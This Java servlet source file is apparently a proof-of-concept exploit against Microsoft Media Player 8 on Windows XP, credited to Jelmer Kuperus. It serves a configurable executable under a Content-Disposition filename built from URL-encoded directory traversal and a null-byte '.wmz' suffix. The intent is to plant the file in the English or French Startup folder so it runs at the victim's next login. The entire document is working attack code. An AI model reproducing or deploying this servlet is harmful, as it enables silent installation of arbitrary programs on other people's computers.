import javax.servlet.http.HttpServlet; import javax.servlet.http.HttpServletRequest; import javax.servlet.http.HttpServletResponse; import javax.servlet.ServletException; import javax.servlet.ServletOutputStream; import java.io.*; /** * * Microsoft media player 8 Exploit for windows XP English and French versions * * It will drop a file in the startup folder * * modify web.xml to change what will be uploaded * * @author Jelmer Kuperus * */ public class MediaPlayerExploit extends HttpServlet { private static final int BUFFER_SIZE = 1024; private static final String[] paths = new String[] { "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CStart%20Menu%5CPrograms%5CStartup%5c", // English "%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cDocuments%20and%20Settings%5CAll%20Users%5CMenu Démarrer%5CProgrammes%5Démarrage%5c" // French }; private String payload; public void init() throws ServletException { payload = getInitParameter("executable"); } public void doGet(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { int language = 0; // default to english try { language = Integer.parseInt(request.getParameter("language")); } catch (NumberFormatException ignored) {} String path = paths[language]; File file = new File(payload); ServletOutputStream sos = response.getOutputStream(); response.setContentType("application/download"); response.setHeader("Content-Disposition","filename=" + path + file.getName() + "%00.wmz"); BufferedInputStream bis = new BufferedInputStream(new FileInputStream(file)); BufferedOutputStream bos = new BufferedOutputStream(sos); byte buffer[] = new byte[BUFFER_SIZE]; int datalength = 0; while ( (datalength = bis.read(buffer,0,BUFFER_SIZE)) > 0) { bos.write(buffer,0,datalength); } bis.close(); bos.close(); } public void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException { doGet(request, response); } }